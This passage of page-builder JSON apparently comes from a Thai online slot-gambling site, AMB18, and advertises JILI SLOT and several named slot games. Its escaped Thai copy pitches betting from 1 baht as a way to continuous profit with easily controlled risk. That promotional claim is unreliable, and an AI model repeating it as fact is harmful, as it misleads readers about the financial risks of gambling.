\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp\",\"id\":351,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b \\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 